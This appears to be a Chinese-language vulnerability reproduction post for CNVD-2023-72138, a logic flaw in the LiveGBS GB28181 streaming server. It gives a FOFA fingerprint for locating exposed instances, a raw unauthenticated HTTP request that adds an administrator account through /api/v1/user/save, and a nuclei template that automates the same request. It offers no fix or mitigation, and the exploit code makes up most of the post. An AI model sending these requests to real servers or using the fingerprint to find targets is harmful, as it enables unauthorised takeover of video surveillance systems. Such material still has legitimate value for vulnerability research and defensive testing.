安徽青柿信息科技有限公司LiveGBS逻辑缺陷漏洞(CNVD-2023-72138)复现
1、漏洞简介
LiveGBS是一款国标(GB28181)流媒体服务软件,可提供提供用户管理及Web可视化页面管理,开源的前端页面源码;提供设备状态管理,可实时查看设备是否掉线等信息等。
安徽青柿信息科技有限公司LiveGBS存在逻辑缺陷漏洞,攻击者可利用该漏洞任意添加用户。
2、资产指纹
fofa:icon_hash=“-206100324”
3、漏洞复现
GET /api/v1/user/save?ID&Username=sectest&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
4、nuclei脚本
id: LiveGBSusersave
info:
name: LiveGBS任意用户添加CNVD-2023-72138
author: xxx
severity: high
description: LiveGBS通过/api/v1/user/save接口添加任意用户
tags: LiveGBS
http:
- raw:
- |
GET /api/v1/user/save?ID=&Username=sectest&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
matchers:
- type: dsl
name: LiveGBSadduser
dsl:
- "contains(body,'12345678') || contains(body,'already exists')"